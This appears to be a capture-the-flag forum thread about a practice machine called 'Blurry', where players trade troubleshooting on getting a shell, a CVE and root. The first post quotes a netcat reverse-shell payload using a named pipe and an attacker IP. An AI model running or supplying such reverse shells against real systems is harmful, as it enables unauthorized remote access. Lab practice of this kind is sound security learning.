Official Blurry Discussion

could someone please help me, no matter how many exploits I try - all the same, I don’t get rev.shell, I have already learned the code, but it is just not used on the target machine, the IP port is correct 100%, payload rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2&1 | nc 10. 10.1x.xx.xx 9001 /tmp/f, listening to the port is also the right one, openvpn is connected with the right file, but the result is always the same, help please!!!

So I copped the user flag, ssh’d into the remote server and navigated around. I also checked the sudo -l permission. I need a little nudge, the cve is giving me some issues, im probably just retarded. the file I need from the repository for the cve isnt there everytime I try and clone it. I downloaded it manually too, still didnt work, so I am kind of at a dead end. The gpt guy everyones talking about doesnt know either lol

your comment “how this type of vulnerability was exploited in the past” got me rooted.
Cheers,